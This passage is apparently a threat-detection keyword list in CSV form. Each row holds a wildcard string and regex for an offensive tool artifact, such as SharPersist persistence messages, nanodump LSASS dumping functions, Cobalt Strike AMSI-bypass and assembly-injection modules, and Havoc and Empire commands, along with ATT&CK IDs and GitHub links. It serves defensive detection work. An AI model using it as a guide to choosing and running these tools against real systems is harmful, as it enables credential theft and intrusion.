Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*INFO: Adding keepass backdoor persistence*",".{0,1000}INFO\:\sAdding\skeepass\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Adding registry persistence*",".{0,1000}INFO\:\sAdding\sregistry\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Adding scheduled task backdoor persistence*",".{0,1000}INFO\:\sAdding\sscheduled\stask\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Adding scheduled task persistence*",".{0,1000}INFO\:\sAdding\sscheduled\stask\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Adding service persistence*",".{0,1000}INFO\:\sAdding\sservice\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Adding startup folder persistence*",".{0,1000}INFO\:\sAdding\sstartup\sfolder\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Adding tortoise svn persistence*",".{0,1000}INFO\:\sAdding\stortoise\ssvn\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Checking backdoor present in KeePass config file*",".{0,1000}INFO\:\sChecking\sbackdoor\spresent\sin\sKeePass\sconfig\sfile.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Listing all scheduled tasks available to backdoor.*",".{0,1000}INFO\:\sListing\sall\sscheduled\stasks\savailable\sto\sbackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*info@skelsecprojects.com*",".{0,1000}info\@skelsecprojects\.com.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*info@tor2web.org*",".{0,1000}info\@tor2web\.org.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*infoga.py -*",".{0,1000}infoga\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*information_gathering_tools.py*",".{0,1000}information_gathering_tools\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*infosecn1nja/SharpDoor*",".{0,1000}infosecn1nja\/SharpDoor.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*infosecn1nja/SharpDoor*",".{0,1000}infosecn1nja\/SharpDoor.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*Initial_Access.ps1*",".{0,1000}Initial_Access\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*InitialAccess_SpearphishingAttachment_FakeWordDoc.py*",".{0,1000}InitialAccess_SpearphishingAttachment_FakeWordDoc\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*InitialAccess_SpearphishingAttachment_Windows.py*",".{0,1000}InitialAccess_SpearphishingAttachment_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Initialised lsarelayx*",".{0,1000}Initialised\slsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*initialize_fake_thread_state*",".{0,1000}initialize_fake_thread_state.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*initialize_spoofed_callstack*",".{0,1000}initialize_spoofed_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*initializeShellcodeFluctuation*",".{0,1000}initializeShellcodeFluctuation.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*Initializing domainDumper()*",".{0,1000}Initializing\sdomainDumper\(\).{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*initstring/cloud_enum*",".{0,1000}initstring\/cloud_enum.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "*inject 1337 /*",".{0,1000}inject\s1337\s\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Inject shellcode on the server.\\nUsage: inject*",".{0,1000}Inject\sshellcode\son\sthe\sserver\.\\\\nUsage\:\sinject.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*inject shellcode*",".{0,1000}inject\sshellcode.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*inject.spawn*",".{0,1000}inject\.spawn.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*inject.spoofaddr*",".{0,1000}inject\.spoofaddr.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*inject_dll_reflective.py*",".{0,1000}inject_dll_reflective\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*inject_dll_srdi.py*",".{0,1000}inject_dll_srdi\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*inject_macro_word(*",".{0,1000}inject_macro_word\(.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*inject_shellcode.py*",".{0,1000}inject_shellcode\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*inject_shellcode_self*",".{0,1000}inject_shellcode_self.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*inject-amsiBypass *",".{0,1000}inject\-amsiBypass\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","0","N/A","10","10","366","68","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*inject-amsi-bypass*",".{0,1000}inject\-amsi\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*inject-amsiBypass.*",".{0,1000}inject\-amsiBypass\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","366","68","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*inject-assembly *",".{0,1000}inject\-assembly\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","0","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*inject-assembly.cna*",".{0,1000}inject\-assembly\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*injectassembly.x64.bin*",".{0,1000}injectassembly\.x64\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*injectassembly.x64.o*",".{0,1000}injectassembly\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*Inject-BypassStuff*",".{0,1000}Inject\-BypassStuff.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*InjectDll.cpp*",".{0,1000}InjectDll\.cpp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*InjectDll.vcxproj*",".{0,1000}InjectDll\.vcxproj.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 